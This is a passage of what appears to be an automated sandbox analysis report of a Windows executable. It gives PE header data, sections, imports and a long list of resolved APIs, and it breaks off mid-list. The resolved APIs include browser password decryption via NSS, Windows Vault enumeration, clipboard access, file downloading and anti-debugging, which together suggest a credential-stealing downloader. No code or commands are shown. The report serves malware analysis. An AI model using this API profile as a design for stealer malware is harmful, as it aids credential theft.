  1603. "name": "GetModuleHandleW",
  1604. "address": "0x42a130"
  1605. },
  1606. {
  1607. "name": "CreateSemaphoreW",
  1608. "address": "0x42a134"
  1609. },
  1610. {
  1611. "name": "SetConsoleCtrlHandler",
  1612. "address": "0x42a138"
  1613. },
  1614. {
  1615. "name": "GetDateFormatW",
  1616. "address": "0x42a13c"
  1617. },
  1618. {
  1619. "name": "GetTimeFormatW",
  1620. "address": "0x42a140"
  1621. },
  1622. {
  1623. "name": "CompareStringW",
  1624. "address": "0x42a144"
  1625. },
  1626. {
  1627. "name": "LCMapStringW",
  1628. "address": "0x42a148"
  1629. },
  1630. {
  1631. "name": "GetLocaleInfoW",
  1632. "address": "0x42a14c"
  1633. },
  1634. {
  1635. "name": "IsValidLocale",
  1636. "address": "0x42a150"
  1637. },
  1638. {
  1639. "name": "GetUserDefaultLCID",
  1640. "address": "0x42a154"
  1641. },
  1642. {
  1643. "name": "EnumSystemLocalesW",
  1644. "address": "0x42a158"
  1645. },
  1646. {
  1647. "name": "FreeLibrary",
  1648. "address": "0x42a15c"
  1649. },
  1650. {
  1651. "name": "LoadLibraryExW",
  1652. "address": "0x42a160"
  1653. },
  1654. {
  1655. "name": "IsValidCodePage",
  1656. "address": "0x42a164"
  1657. },
  1658. {
  1659. "name": "GetACP",
  1660. "address": "0x42a168"
  1661. },
  1662. {
  1663. "name": "GetOEMCP",
  1664. "address": "0x42a16c"
  1665. },
  1666. {
  1667. "name": "GetCPInfo",
  1668. "address": "0x42a170"
  1669. },
  1670. {
  1671. "name": "ReadConsoleW",
  1672. "address": "0x42a174"
  1673. }
  1674. ],
  1675. "dll": "KERNEL32.dll"
  1676. },
  1677. {
  1678. "imports": [
  1679. {
  1680. "name": "DialogBoxIndirectParamW",
  1681. "address": "0x42a184"
  1682. },
  1683. {
  1684. "name": "IsZoomed",
  1685. "address": "0x42a188"
  1686. },
  1687. {
  1688. "name": "RegisterDeviceNotificationW",
  1689. "address": "0x42a18c"
  1690. },
  1691. {
  1692. "name": "DrawStateA",
  1693. "address": "0x42a190"
  1694. },
  1695. {
  1696. "name": "GetMonitorInfoW",
  1697. "address": "0x42a194"
  1698. }
  1699. ],
  1700. "dll": "USER32.dll"
  1701. },
  1702. {
  1703. "imports": [
  1704. {
  1705. "name": "AbortSystemShutdownA",
  1706. "address": "0x42a000"
  1707. },
  1708. {
  1709. "name": "RegCreateKeyExA",
  1710. "address": "0x42a004"
  1711. },
  1712. {
  1713. "name": "RegisterServiceCtrlHandlerW",
  1714. "address": "0x42a008"
  1715. }
  1716. ],
  1717. "dll": "ADVAPI32.dll"
  1718. },
  1719. {
  1720. "imports": [
  1721. {
  1722. "name": "TransparentBlt",
  1723. "address": "0x42a17c"
  1724. }
  1725. ],
  1726. "dll": "MSIMG32.dll"
  1727. }
  1728. ],
  1729. "digital_signers": null,
  1730. "exported_dll_name": null,
  1731. "actual_checksum": "0x000456cb",
  1732. "overlay": null,
  1733. "imagebase": "0x00400000",
  1734. "reported_checksum": "0x000456cb",
  1735. "icon_hash": null,
  1736. "entrypoint": "0x00404ea5",
  1737. "timestamp": "2018-11-21 05:28:09",
  1738. "osversion": "5.1",
  1739. "sections": [
  1740. {
  1741. "name": ".text",
  1742. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
  1743. "virtual_address": "0x00001000",
  1744. "size_of_data": "0x00028800",
  1745. "entropy": "6.65",
  1746. "raw_address": "0x00000400",
  1747. "virtual_size": "0x0002866f",
  1748. "characteristics_raw": "0x60000020"
  1749. },
  1750. {
  1751. "name": ".rdata",
  1752. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  1753. "virtual_address": "0x0002a000",
  1754. "size_of_data": "0x00011800",
  1755. "entropy": "6.22",
  1756. "raw_address": "0x00028c00",
  1757. "virtual_size": "0x00011630",
  1758. "characteristics_raw": "0x40000040"
  1759. },
  1760. {
  1761. "name": ".data",
  1762. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1763. "virtual_address": "0x0003c000",
  1764. "size_of_data": "0x00001e00",
  1765. "entropy": "3.06",
  1766. "raw_address": "0x0003a400",
  1767. "virtual_size": "0x00804ea0",
  1768. "characteristics_raw": "0xc0000040"
  1769. },
  1770. {
  1771. "name": ".rsrc",
  1772. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  1773. "virtual_address": "0x00841000",
  1774. "size_of_data": "0x00003e00",
  1775. "entropy": "6.27",
  1776. "raw_address": "0x0003c200",
  1777. "virtual_size": "0x00003d40",
  1778. "characteristics_raw": "0x40000040"
  1779. },
  1780. {
  1781. "name": ".reloc",
  1782. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  1783. "virtual_address": "0x00845000",
  1784. "size_of_data": "0x00002200",
  1785. "entropy": "6.64",
  1786. "raw_address": "0x00040000",
  1787. "virtual_size": "0x000021a4",
  1788. "characteristics_raw": "0x42000040"
  1789. }
  1790. ],
  1791. "resources": [],
  1792. "dirents": [
  1793. {
  1794. "virtual_address": "0x00000000",
  1795. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  1796. "size": "0x00000000"
  1797. },
  1798. {
  1799. "virtual_address": "0x0003accc",
  1800. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  1801. "size": "0x00000064"
  1802. },
  1803. {
  1804. "virtual_address": "0x00841000",
  1805. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  1806. "size": "0x00003d40"
  1807. },
  1808. {
  1809. "virtual_address": "0x00000000",
  1810. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  1811. "size": "0x00000000"
  1812. },
  1813. {
  1814. "virtual_address": "0x00000000",
  1815. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  1816. "size": "0x00000000"
  1817. },
  1818. {
  1819. "virtual_address": "0x00845000",
  1820. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  1821. "size": "0x000021a4"
  1822. },
  1823. {
  1824. "virtual_address": "0x0002a1f0",
  1825. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  1826. "size": "0x00000038"
  1827. },
  1828. {
  1829. "virtual_address": "0x00000000",
  1830. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  1831. "size": "0x00000000"
  1832. },
  1833. {
  1834. "virtual_address": "0x00000000",
  1835. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  1836. "size": "0x00000000"
  1837. },
  1838. {
  1839. "virtual_address": "0x00000000",
  1840. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  1841. "size": "0x00000000"
  1842. },
  1843. {
  1844. "virtual_address": "0x00000000",
  1845. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  1846. "size": "0x00000000"
  1847. },
  1848. {
  1849. "virtual_address": "0x00000000",
  1850. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  1851. "size": "0x00000000"
  1852. },
  1853. {
  1854. "virtual_address": "0x0002a000",
  1855. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  1856. "size": "0x0000019c"
  1857. },
  1858. {
  1859. "virtual_address": "0x00000000",
  1860. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  1861. "size": "0x00000000"
  1862. },
  1863. {
  1864. "virtual_address": "0x00000000",
  1865. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  1866. "size": "0x00000000"
  1867. },
  1868. {
  1869. "virtual_address": "0x00000000",
  1870. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  1871. "size": "0x00000000"
  1872. }
  1873. ],
  1874. "exports": [],
  1875. "guest_signers": {},
  1876. "imphash": "e226e36fbb8dbb02d3784367b0c7fa81",
  1877. "icon_fuzzy": null,
  1878. "icon": null,
  1879. "pdbpath": "C:\\vagar_helayagu-limi.pdb\\x00ntime\\crypt\\tmp_92407619\\bin\\vuvigilil.pdb\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xab\\x00\\x00\\x00\\xab\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\xd7C\\x00\\xf8\\x9aC",
  1880. "imported_dll_count": 4,
  1881. "versioninfo": []
  1882. }
  1883. }
  1884.  
  1885. [*] Resolved APIs: [
  1886. "kernel32.dll.FlsAlloc",
  1887. "kernel32.dll.FlsFree",
  1888. "kernel32.dll.FlsGetValue",
  1889. "kernel32.dll.FlsSetValue",
  1890. "kernel32.dll.InitializeCriticalSectionEx",
  1891. "kernel32.dll.CreateEventExW",
  1892. "kernel32.dll.CreateSemaphoreExW",
  1893. "kernel32.dll.SetThreadStackGuarantee",
  1894. "kernel32.dll.CreateThreadpoolTimer",
  1895. "kernel32.dll.SetThreadpoolTimer",
  1896. "kernel32.dll.WaitForThreadpoolTimerCallbacks",
  1897. "kernel32.dll.CloseThreadpoolTimer",
  1898. "kernel32.dll.CreateThreadpoolWait",
  1899. "kernel32.dll.SetThreadpoolWait",
  1900. "kernel32.dll.CloseThreadpoolWait",
  1901. "kernel32.dll.FlushProcessWriteBuffers",
  1902. "kernel32.dll.FreeLibraryWhenCallbackReturns",
  1903. "kernel32.dll.GetCurrentProcessorNumber",
  1904. "kernel32.dll.GetLogicalProcessorInformation",
  1905. "kernel32.dll.CreateSymbolicLinkW",
  1906. "kernel32.dll.EnumSystemLocalesEx",
  1907. "kernel32.dll.CompareStringEx",
  1908. "kernel32.dll.GetDateFormatEx",
  1909. "kernel32.dll.GetLocaleInfoEx",
  1910. "kernel32.dll.GetTimeFormatEx",
  1911. "kernel32.dll.GetUserDefaultLocaleName",
  1912. "kernel32.dll.IsValidLocaleName",
  1913. "kernel32.dll.LCMapStringEx",
  1914. "kernel32.dll.GetTickCount64",
  1915. "kernel32.dll.LoadLibraryA",
  1916. "kernel32.dll.VirtualAlloc",
  1917. "kernel32.dll.VirtualProtect",
  1918. "kernel32.dll.VirtualFree",
  1919. "kernel32.dll.GetVersionExA",
  1920. "kernel32.dll.TerminateProcess",
  1921. "kernel32.dll.ExitProcess",
  1922. "kernel32.dll.SetErrorMode",
  1923. "msvcrt.dll._controlfp",
  1924. "msvcrt.dll._except_handler3",
  1925. "msvcrt.dll.__set_app_type",
  1926. "msvcrt.dll.__p__fmode",
  1927. "msvcrt.dll.isalpha",
  1928. "msvcrt.dll.__p__commode",
  1929. "msvcrt.dll._adjust_fdiv",
  1930. "msvcrt.dll.__setusermatherr",
  1931. "msvcrt.dll._initterm",
  1932. "msvcrt.dll.__getmainargs",
  1933. "msvcrt.dll._acmdln",
  1934. "msvcrt.dll.exit",
  1935. "msvcrt.dll._XcptFilter",
  1936. "msvcrt.dll._exit",
  1937. "msvcrt.dll._snprintf",
  1938. "msvcrt.dll.fclose",
  1939. "msvcrt.dll.fseek",
  1940. "msvcrt.dll.ftell",
  1941. "msvcrt.dll.wcsstr",
  1942. "msvcrt.dll._wfopen",
  1943. "msvcrt.dll.srand",
  1944. "msvcrt.dll.rand",
  1945. "msvcrt.dll._snwprintf",
  1946. "msvcrt.dll.isdigit",
  1947. "msvcrt.dll.memset",
  1948. "msvcrt.dll.memcpy",
  1949. "wininet.dll.InternetOpenUrlA",
  1950. "wininet.dll.HttpQueryInfoA",
  1951. "wininet.dll.InternetCloseHandle",
  1952. "wininet.dll.InternetReadFile",
  1953. "wininet.dll.InternetOpenUrlW",
  1954. "wininet.dll.InternetOpenW",
  1955. "wininet.dll.InternetOpenA",
  1956. "urlmon.dll.URLDownloadToFileW",
  1957. "shlwapi.dll.PathFileExistsW",
  1958. "shlwapi.dll.PathFindFileNameA",
  1959. "shlwapi.dll.PathFindFileNameW",
  1960. "kernel32.dll.GetModuleFileNameW",
  1961. "kernel32.dll.GetFileAttributesW",
  1962. "kernel32.dll.CopyFileW",
  1963. "kernel32.dll.CreateDirectoryW",
  1964. "kernel32.dll.GetLogicalDriveStringsW",
  1965. "kernel32.dll.GetDriveTypeW",
  1966. "kernel32.dll.FindFirstFileW",
  1967. "kernel32.dll.ExpandEnvironmentStringsW",
  1968. "kernel32.dll.DeleteFileW",
  1969. "kernel32.dll.CloseHandle",
  1970. "kernel32.dll.FindClose",
  1971. "kernel32.dll.WriteFile",
  1972. "kernel32.dll.GetTickCount",
  1973. "kernel32.dll.GlobalUnlock",
  1974. "kernel32.dll.Sleep",
  1975. "kernel32.dll.GlobalAlloc",
  1976. "kernel32.dll.GlobalLock",
  1977. "kernel32.dll.IsDebuggerPresent",
  1978. "kernel32.dll.GetModuleHandleA",
  1979. "kernel32.dll.Process32First",
  1980. "kernel32.dll.Process32Next",
  1981. "kernel32.dll.FindNextFileW",
  1982. "kernel32.dll.SetFileAttributesW",
  1983. "kernel32.dll.GetVolumeInformationW",
  1984. "kernel32.dll.CreateFileW",
  1985. "kernel32.dll.ExitThread",
  1986. "kernel32.dll.GetStartupInfoA",
  1987. "kernel32.dll.CreateThread",
  1988. "kernel32.dll.CreateMutexA",
  1989. "kernel32.dll.GetLastError",
  1990. "kernel32.dll.CreateToolhelp32Snapshot",
  1991. "kernel32.dll.CreateProcessW",
  1992. "user32.dll.SetClipboardData",
  1993. "user32.dll.OpenClipboard",
  1994. "user32.dll.EmptyClipboard",
  1995. "user32.dll.GetClipboardData",
  1996. "user32.dll.CloseClipboard",
  1997. "user32.dll.CharUpperA",
  1998. "advapi32.dll.RegCreateKeyExA",
  1999. "advapi32.dll.RegCloseKey",
  2000. "advapi32.dll.RegSetValueExW",
  2001. "advapi32.dll.RegOpenKeyExW",
  2002. "shell32.dll.ShellExecuteW",
  2003. "ole32.dll.CoInitialize",
  2004. "ole32.dll.CoCreateInstance",
  2005. "msvcr100.dll.atexit",
  2006. "rasapi32.dll.RasConnectionNotificationW",
  2007. "sechost.dll.NotifyServiceStatusChangeA",
  2008. "cryptbase.dll.SystemFunction036",
  2009. "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
  2010. "setupapi.dll.CM_Get_Device_Interface_List_ExW",
  2011. "kernel32.dll.InitOnceExecuteOnce",
  2012. "kernel32.dll.CreateSemaphoreW",
  2013. "kernel32.dll.GetFileInformationByHandleEx",
  2014. "kernel32.dll.SetFileInformationByHandle",
  2015. "kernel32.dll.InitializeConditionVariable",
  2016. "kernel32.dll.WakeConditionVariable",
  2017. "kernel32.dll.WakeAllConditionVariable",
  2018. "kernel32.dll.SleepConditionVariableCS",
  2019. "kernel32.dll.InitializeSRWLock",
  2020. "kernel32.dll.AcquireSRWLockExclusive",
  2021. "kernel32.dll.TryAcquireSRWLockExclusive",
  2022. "kernel32.dll.ReleaseSRWLockExclusive",
  2023. "kernel32.dll.SleepConditionVariableSRW",
  2024. "kernel32.dll.CreateThreadpoolWork",
  2025. "kernel32.dll.SubmitThreadpoolWork",
  2026. "kernel32.dll.CloseThreadpoolWork",
  2027. "api-ms-win-core-synch-l1-2-0.dll.InitializeConditionVariable",
  2028. "api-ms-win-core-synch-l1-2-0.dll.SleepConditionVariableCS",
  2029. "api-ms-win-core-synch-l1-2-0.dll.WakeAllConditionVariable",
  2030. "uxtheme.dll.ThemeInitApiHook",
  2031. "user32.dll.IsProcessDPIAware",
  2032. "ws2_32.dll.GetAddrInfoW",
  2033. "ws2_32.dll.WSASocketW",
  2034. "ws2_32.dll.#2",
  2035. "ws2_32.dll.#21",
  2036. "ws2_32.dll.#9",
  2037. "ws2_32.dll.WSAIoctl",
  2038. "ws2_32.dll.FreeAddrInfoW",
  2039. "ws2_32.dll.#6",
  2040. "ws2_32.dll.#5",
  2041. "schannel.dll.SpUserModeInitialize",
  2042. "advapi32.dll.RegCreateKeyExW",
  2043. "advapi32.dll.RegQueryValueExW",
  2044. "ws2_32.dll.WSASend",
  2045. "ws2_32.dll.WSARecv",
  2046. "secur32.dll.FreeContextBuffer",
  2047. "ncrypt.dll.SslOpenProvider",
  2048. "ncrypt.dll.GetSChannelInterface",
  2049. "bcryptprimitives.dll.GetHashInterface",
  2050. "ncrypt.dll.SslIncrementProviderReferenceCount",
  2051. "ncrypt.dll.SslImportKey",
  2052. "bcryptprimitives.dll.GetCipherInterface",
  2053. "ncrypt.dll.SslLookupCipherSuiteInfo",
  2054. "user32.dll.LoadStringW",
  2055. "ncrypt.dll.BCryptOpenAlgorithmProvider",
  2056. "ncrypt.dll.BCryptGetProperty",
  2057. "ncrypt.dll.BCryptCreateHash",
  2058. "ncrypt.dll.BCryptHashData",
  2059. "ncrypt.dll.BCryptFinishHash",
  2060. "ncrypt.dll.BCryptDestroyHash",
  2061. "crypt32.dll.CertGetCertificateChain",
  2062. "userenv.dll.GetUserProfileDirectoryW",
  2063. "sechost.dll.ConvertSidToStringSidW",
  2064. "sechost.dll.ConvertStringSidToSidW",
  2065. "userenv.dll.RegisterGPNotification",
  2066. "gpapi.dll.RegisterGPNotificationInternal",
  2067. "sechost.dll.OpenSCManagerW",
  2068. "sechost.dll.OpenServiceW",
  2069. "sechost.dll.CloseServiceHandle",
  2070. "sechost.dll.QueryServiceConfigW",
  2071. "cryptsp.dll.CryptAcquireContextA",
  2072. "cryptsp.dll.CryptCreateHash",
  2073. "cryptsp.dll.CryptHashData",
  2074. "cryptsp.dll.CryptVerifySignatureA",
  2075. "cryptsp.dll.CryptDestroyKey",
  2076. "cryptsp.dll.CryptDestroyHash",
  2077. "bcryptprimitives.dll.GetAsymmetricEncryptionInterface",
  2078. "ncrypt.dll.BCryptImportKeyPair",
  2079. "ncrypt.dll.BCryptVerifySignature",
  2080. "ncrypt.dll.BCryptDestroyKey",
  2081. "crypt32.dll.CertVerifyCertificateChainPolicy",
  2082. "crypt32.dll.CertFreeCertificateChain",
  2083. "crypt32.dll.CertDuplicateCertificateContext",
  2084. "ncrypt.dll.SslEncryptPacket",
  2085. "ncrypt.dll.SslDecryptPacket",
  2086. "crypt32.dll.CertFreeCertificateContext",
  2087. "ncrypt.dll.SslDecrementProviderReferenceCount",
  2088. "ncrypt.dll.SslFreeObject",
  2089. "urlmon.dll.URLDownloadToFileA",
  2090. "sechost.dll.OpenServiceA",
  2091. "urlmon.dll.CoInternetCreateSecurityManager",
  2092. "urlmon.dll.CoInternetCreateZoneManager",
  2093. "urlmon.dll.CoInternetIsFeatureEnabledForUrl",
  2094. "advapi32.dll.RegQueryInfoKeyW",
  2095. "advapi32.dll.RegEnumKeyExW",
  2096. "advapi32.dll.RegEnumValueW",
  2097. "kernel32.dll.QueryActCtxW",
  2098. "shlwapi.dll.UrlIsW",
  2099. "kernel32.dll.FindActCtxSectionStringW",
  2100. "kernel32.dll.GetSystemWindowsDirectoryW",
  2101. "sqlite3.dll.sqlite3_open_v2",
  2102. "sqlite3.dll.sqlite3_prepare_v2",
  2103. "sqlite3.dll.sqlite3_step",
  2104. "sqlite3.dll.sqlite3_column_bytes",
  2105. "sqlite3.dll.sqlite3_column_blob",
  2106. "sqlite3.dll.sqlite3_column_text",
  2107. "sqlite3.dll.sqlite3_finalize",
  2108. "sqlite3.dll.sqlite3_close",
  2109. "kernel32.dll.AreFileApisANSI",
  2110. "kernel32.dll.LCIDToLocaleName",
  2111. "kernel32.dll.LocaleNameToLCID",
  2112. "rpcrt4.dll.RpcStringBindingComposeW",
  2113. "rpcrt4.dll.RpcBindingFromStringBindingW",
  2114. "rpcrt4.dll.NdrClientCall2",
  2115. "rpcrt4.dll.RpcStringFreeW",
  2116. "rpcrt4.dll.RpcBindingFree",
  2117. "mlang.dll.#112",
  2118. "wininet.dll.FindFirstUrlCacheEntryA",
  2119. "urlmon.dll.CreateUri",
  2120. "cryptsp.dll.CryptGetHashParam",
  2121. "cryptsp.dll.CryptReleaseContext",
  2122. "wininet.dll.FindNextUrlCacheEntryA",
  2123. "urlmon.dll.CreateIUriBuilder",
  2124. "urlmon.dll.IntlPercentEncodeNormalize",
  2125. "wininet.dll.FindCloseUrlCache",
  2126. "vaultcli.dll.VaultOpenVault",
  2127. "vaultcli.dll.VaultCloseVault",
  2128. "vaultcli.dll.VaultEnumerateItems",
  2129. "vaultcli.dll.VaultGetItem",
  2130. "vaultcli.dll.VaultFree",
  2131. "ws2_32.dll.#22",
  2132. "nss3.dll.NSS_Init",
  2133. "nss3.dll.NSS_Shutdown",
  2134. "nss3.dll.PK11_GetInternalKeySlot",
  2135. "nss3.dll.PK11_FreeSlot",
  2136. "nss3.dll.PK11_Authenticate",
  2137. "nss3.dll.PK11SDR_Decrypt",
  2138. "nss3.dll.sqlite3_open",
  2139. "nss3.dll.sqlite3_prepare_v2",
  2140. "nss3.dll.sqlite3_step",
  2141. "nss3.dll.sqlite3_column_text",
  2142. "nss3.dll.sqlite3_finalize",
  2143. "nss3.dll.sqlite3_close",
  2144. "pstorec.dll.PStoreCreateInstance",
  2145. "kernel32.dll.IsProcessorFeaturePresent",
  2146. "user32.dll.GetWindowInfo",
  2147. "user32.dll.GetAncestor",
  2148. "user32.dll.GetMonitorInfoA",
  2149. "user32.dll.EnumDisplayMonitors",
  2150. "user32.dll.EnumDisplayDevicesA",
  2151. "gdi32.dll.ExtTextOutW",
  2152. "gdi32.dll.GdiIsMetaPrintDC",
  2153. "windowscodecs.dll.DllGetClassObject",
  2154. "kernel32.dll.WerRegisterMemoryBlock",
  2155. "oleaut32.dll.#8",
  2156. "oleaut32.dll.#9",
  2157. "oleaut32.dll.#10",
  2158. "mscoree.dll.CorExitProcess",
  2159. "kernel32.dll.SetThreadUILanguage",
  2160. "kernel32.dll.CopyFileExW",
  2161. "kernel32.dll.SetConsoleInputExeNameW",
  2162. "kernel32.dll.SortGetHandle",
  2163. "kernel32.dll.SortCloseHandle",
  2164. "mswsock.dll.WSPStartup",
  2165. "wshtcpip.dll.WSHOpenSocket",
  2166. "wshtcpip.dll.WSHOpenSocket2",
  2167. "wshtcpip.dll.WSHJoinLeaf",
  2168. "wshtcpip.dll.WSHNotify",
  2169. "wshtcpip.dll.WSHGetSocketInformation",
  2170. "wshtcpip.dll.WSHSetSocketInformation",
  2171. "wshtcpip.dll.WSHGetSockaddrType",
  2172. "wshtcpip.dll.WSHGetWildcardSockaddr",
  2173. "wshtcpip.dll.WSHGetBroadcastSockaddr",
  2174. "wshtcpip.dll.WSHAddressToString",
  2175. "wshtcpip.dll.WSHStringToAddress",
  2176. "wshtcpip.dll.WSHIoctl",
  2177. "sechost.dll.LookupAccountNameLocalW",
  2178. "advapi32.dll.LookupAccountSidW",
  2179. "sechost.dll.LookupAccountSidLocalW",
  2180. "wersvc.dll.ServiceMain",
  2181. "wersvc.dll.SvchostPushServiceGlobals",
  2182. "advapi32.dll.RegGetValueW",
  2183. "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
  2184. "faultrep.dll.WerpInitiateCrashReporting",
  2185. "wer.dll.WerpCreateMachineStore",
  2186. "shell32.dll.SHGetFolderPathEx",
  2187. "ole32.dll.StringFromGUID2",
  2188. "profapi.dll.#104",
  2189. "userenv.dll.CreateEnvironmentBlock",
  2190. "sspicli.dll.GetUserNameExW",
  2191. "userenv.dll.DestroyEnvironmentBlock",
  2192. "wer.dll.WerpSvcReportFromMachineQueue",
  2193. "advapi32.dll.OpenProcessToken",
  2194. "advapi32.dll.DuplicateToken",
  2195. "advapi32.dll.AllocateAndInitializeSid",
  2196. "advapi32.dll.CheckTokenMembership",
  2197. "advapi32.dll.FreeSid",
  2198. "wtsapi32.dll.WTSQueryUserToken",
  2199. "winsta.dll.WinStationQueryInformationW",
  2200. "advapi32.dll.CreateWellKnownSid",
  2201. "rpcrt4.dll.RpcBindingSetAuthInfoExW",
  2202. "rpcrt4.dll.NdrClientCall3",
  2203. "advapi32.dll.ImpersonateLoggedOnUser",
  2204. "advapi32.dll.CreateProcessAsUserW",
  2205. "advapi32.dll.RevertToSelf",
  2206. "imm32.dll.ImmDisableIME",
  2207. "psapi.dll.GetModuleFileNameExW",
  2208. "version.dll.GetFileVersionInfoSizeW",
  2209. "version.dll.GetFileVersionInfoW",
  2210. "version.dll.VerQueryValueW",
  2211. "wer.dll.WerpCreateIntegratorReportId",
  2212. "wer.dll.WerReportCreate",
  2213. "wer.dll.WerpSetIntegratorReportId",
  2214. "wer.dll.WerReportSetParameter",
  2215. "dbgeng.dll.DebugCreate",
  2216. "ntdll.dll.CsrGetProcessId",
  2217. "ntdll.dll.DbgBreakPoint",
  2218. "ntdll.dll.DbgPrint",
  2219. "ntdll.dll.DbgPrompt",
  2220. "ntdll.dll.DbgUiConvertStateChangeStructure",
  2221. "ntdll.dll.DbgUiGetThreadDebugObject",
  2222. "ntdll.dll.DbgUiIssueRemoteBreakin",
  2223. "ntdll.dll.DbgUiSetThreadDebugObject",
  2224. "ntdll.dll.NtAllocateVirtualMemory",
  2225. "ntdll.dll.NtClose",
  2226. "ntdll.dll.NtCreateDebugObject",
  2227. "ntdll.dll.NtCreateFile",
  2228. "ntdll.dll.NtDebugActiveProcess",
  2229. "ntdll.dll.NtDebugContinue",
  2230. "ntdll.dll.NtFreeVirtualMemory",
  2231. "ntdll.dll.NtOpenProcess",
  2232. "ntdll.dll.NtOpenThread",
  2233. "ntdll.dll.NtQueryInformationProcess",
  2234. "ntdll.dll.NtQueryInformationThread",
  2235. "ntdll.dll.NtQueryMutant",
  2236. "ntdll.dll.NtQueryObject",
  2237. "ntdll.dll.NtQuerySystemInformation",
  2238. "ntdll.dll.NtRemoveProcessDebug",
  2239. "ntdll.dll.NtResumeThread",
  2240. "ntdll.dll.NtSetInformationDebugObject",
  2241. "ntdll.dll.NtSetInformationProcess",
  2242. "ntdll.dll.NtSystemDebugControl",
  2243. "ntdll.dll.NtWaitForDebugEvent",
  2244. "ntdll.dll.RtlAnsiStringToUnicodeString",
  2245. "ntdll.dll.RtlCreateProcessParameters",
  2246. "ntdll.dll.RtlCreateUserProcess",
  2247. "ntdll.dll.RtlDestroyProcessParameters",
  2248. "ntdll.dll.RtlDosPathNameToNtPathName_U",
  2249. "ntdll.dll.RtlFindMessage",
  2250. "ntdll.dll.RtlFreeHeap",
  2251. "ntdll.dll.RtlFreeUnicodeString",
  2252. "ntdll.dll.RtlGetFunctionTableListHead",
  2253. "ntdll.dll.RtlGetUnloadEventTrace",
  2254. "ntdll.dll.RtlGetUnloadEventTraceEx",
  2255. "ntdll.dll.RtlInitAnsiString",
  2256. "ntdll.dll.RtlInitUnicodeString",
  2257. "ntdll.dll.RtlTryEnterCriticalSection",
  2258. "ntdll.dll.RtlUnicodeStringToAnsiString",
  2259. "ntdll.dll.NtOpenProcessToken",
  2260. "ntdll.dll.NtOpenThreadToken",
  2261. "ntdll.dll.NtQueryInformationToken",
  2262. "kernel32.dll.CloseProfileUserMapping",
  2263. "kernel32.dll.DebugActiveProcessStop",
  2264. "kernel32.dll.DebugBreak",
  2265. "kernel32.dll.DebugBreakProcess",
  2266. "kernel32.dll.DebugSetProcessKillOnExit",
  2267. "kernel32.dll.Module32First",
  2268. "kernel32.dll.Module32FirstW",
  2269. "kernel32.dll.Module32Next",
  2270. "kernel32.dll.Module32NextW",
  2271. "kernel32.dll.OpenThread",
  2272. "kernel32.dll.Process32FirstW",
  2273. "kernel32.dll.Process32NextW",
  2274. "kernel32.dll.ProcessIdToSessionId",
  2275. "kernel32.dll.SetProcessShutdownParameters",
  2276. "kernel32.dll.Thread32First",
  2277. "kernel32.dll.Thread32Next",
  2278. "kernel32.dll.GetTimeZoneInformation",
  2279. "kernel32.dll.DuplicateHandle",
  2280. "kernel32.dll.Wow64GetThreadSelectorEntry",
  2281. "advapi32.dll.CloseServiceHandle",
  2282. "advapi32.dll.ControlService",
  2283. "advapi32.dll.CreateServiceA",
  2284. "advapi32.dll.CreateServiceW",
  2285. "advapi32.dll.DeleteService",
  2286. "advapi32.dll.EnumServicesStatusExA",
  2287. "advapi32.dll.EnumServicesStatusExW",
  2288. "advapi32.dll.GetEventLogInformation",
  2289. "advapi32.dll.GetTokenInformation",
  2290. "advapi32.dll.OpenSCManagerA",
  2291. "advapi32.dll.OpenSCManagerW",
  2292. "advapi32.dll.OpenServiceA",
  2293. "advapi32.dll.OpenServiceW",
  2294. "advapi32.dll.StartServiceA",
  2295. "advapi32.dll.StartServiceW",
  2296. "advapi32.dll.GetSidSubAuthority",
  2297. "advapi32.dll.GetSidSubAuthorityCount",
  2298. "version.dll.GetFileVersionInfoSizeExW",
  2299. "version.dll.GetFileVersionInfoExW",
  2300. "dbghelp.dll.WinDbgExtensionDllInit",
  2301. "dbghelp.dll.ExtensionApiVersion",
  2302. "wer.dll.WerpSetDynamicParameter",
  2303. "wer.dll.WerReportAddDump",
  2304. "wer.dll.WerpSetCallBack",
  2305. "wer.dll.WerReportSetUIOption",
  2306. "wer.dll.WerpAddRegisteredDataToReport",
  2307. "wer.dll.WerReportSubmit",
  2308. "sensapi.dll.IsNetworkAlive",
  2309. "user32.dll.CharUpperW",
  2310. "wer.dll.WerpAddAppCompatData",
  2311. "apphelp.dll.SdbGetFileAttributes",
  2312. "apphelp.dll.SdbFormatAttribute",
  2313. "apphelp.dll.SdbFreeFileAttributes",
  2314. "cryptsp.dll.CryptAcquireContextW",
  2315. "dbghelp.dll.MiniDumpWriteDump",
  2316. "kernel32.dll.GetLongPathNameA",
  2317. "kernel32.dll.GetLongPathNameW",
  2318. "kernel32.dll.GetProcessTimes",
  2319. "advapi32.dll.RegOpenKeyExA",
